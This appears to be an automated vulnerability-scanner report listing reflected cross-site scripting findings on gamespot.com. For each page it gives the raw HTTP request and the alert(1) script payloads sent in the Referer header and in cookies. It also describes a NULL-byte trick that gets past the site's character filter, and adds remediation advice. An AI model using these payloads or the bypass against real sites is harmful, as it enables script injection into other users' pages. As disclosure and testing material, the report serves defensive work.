Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ps3/action/grandtheftauto4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 3469b"><a>4d3616c454b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00719b8"><a>602d96f3fd8 was submitted in the Referer HTTP header. This input was echoed as 719b8"><a>602d96f3fd8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ps3/driving/granturismo52/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: %00719b8"><a>602d96f3fd8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68387"><a>058ec7928d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /reviews.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 68387"><a>058ec7928d9
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 532f2"><script>alert(1)</script>b94df4ecf35 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /signup/raptr/upgrade.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: http://www.google.com/search?hl=en&q=532f2"><script>alert(1)</script>b94df4ecf35
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da335"><a>ccffc3eb895 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videos/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: da335"><a>ccffc3eb895
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0928"><a>0e5173f2dae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /wii/action/smb/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: e0928"><a>0e5173f2dae
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235f"><a>0609cf5e859 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xbox/action/gta4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 2235f"><a>0609cf5e859
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f13c"><a>304e1d842b0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xbox360/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 9f13c"><a>304e1d842b0
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d0d"><a>f96950f1032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xbox360/action/callofduty7workingtitle/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 79d0d"><a>f96950f1032
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0037418"><a>a3f4d5944e0 was submitted in the Referer HTTP header. This input was echoed as 37418"><a>a3f4d5944e0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /xbox360/action/grandtheftautoivtheballadofgaytony/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: %0037418"><a>a3f4d5944e0
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2d2"><a>c405d6b15f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xbox360/action/saintsrow/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: ae2d2"><a>c405d6b15f6
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b8f"><a>ca6f01de812 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /xbox360/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F; Referer: 65b8f"><a>ca6f01de812
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc2ce"><script>alert(1)</script>09ad9a3dae8 was submitted in the XCLGFbrowser cookie. This input was echoed as dc2ce\"><script>alert(1)</script>09ad9a3dae8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwdc2ce"><script>alert(1)</script>09ad9a3dae8; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 362d4"><script>alert(1)</script>801ae403e4a was submitted in the globid cookie. This input was echoed as 362d4\"><script>alert(1)</script>801ae403e4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX362d4"><script>alert(1)</script>801ae403e4a; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a69c"><script>alert(1)</script>15c80a4d846 was submitted in the XCLGFbrowser cookie. This input was echoed as 2a69c\"><script>alert(1)</script>15c80a4d846 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /android/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw2a69c"><script>alert(1)</script>15c80a4d846; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30179"><script>alert(1)</script>de41c2bd7b7 was submitted in the globid cookie. This input was echoed as 30179\"><script>alert(1)</script>de41c2bd7b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /android/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX30179"><script>alert(1)</script>de41c2bd7b7; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1e5"><script>alert(1)</script>f8fa33bfe8c was submitted in the XCLGFbrowser cookie. This input was echoed as 3e1e5\"><script>alert(1)</script>f8fa33bfe8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /best-of-2010/game-of-the-year/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw3e1e5"><script>alert(1)</script>f8fa33bfe8c; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df07d</script><script>alert(1)</script>0faa05965ef was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /best-of-2010/game-of-the-year/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwdf07d</script><script>alert(1)</script>0faa05965ef; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7f5"><script>alert(1)</script>b29eec4cf18 was submitted in the globid cookie. This input was echoed as ed7f5\"><script>alert(1)</script>b29eec4cf18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /best-of-2010/game-of-the-year/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXed7f5"><script>alert(1)</script>b29eec4cf18; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2f8"><script>alert(1)</script>f3db0d8dbe4 was submitted in the XCLGFbrowser cookie. This input was echoed as 8a2f8\"><script>alert(1)</script>f3db0d8dbe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cheats.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw8a2f8"><script>alert(1)</script>f3db0d8dbe4; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f34"><script>alert(1)</script>c2c262917dc was submitted in the globid cookie. This input was echoed as 90f34\"><script>alert(1)</script>c2c262917dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cheats.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX90f34"><script>alert(1)</script>c2c262917dc; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd02"><script>alert(1)</script>5b85a4ed3a7 was submitted in the XCLGFbrowser cookie. This input was echoed as 8cd02\"><script>alert(1)</script>5b85a4ed3a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
